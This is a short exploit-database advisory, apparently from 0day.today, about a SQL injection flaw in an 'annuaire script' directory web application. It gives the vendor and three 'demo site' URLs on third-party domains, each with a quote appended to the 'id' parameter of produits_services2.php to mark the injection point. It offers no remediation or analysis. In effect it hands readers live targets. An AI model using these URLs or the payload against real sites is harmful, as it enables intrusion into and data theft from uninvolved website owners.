id: 19756
date: 11/17/2012
title: annuaire script SQL Injection Vulnerability
author: xFree
cves: 

#######################################################
#exploit title : annuaire script / SQL Injection Vulnerability/
#author : xFree
#vendor : http://www.agadirannuaire.net/
#categoey : webapps
#google dork : 
#demo site : http://pub4you.net/produits_services2.php?id=16'
#                      http://www.cavernedalibabamaroc.com/produits_services2.php?id=525'
#                      http://www.pressinter.com/produits_services2.php?id=528'                       
#######################################################

#  0day.today [2023-03-24]  #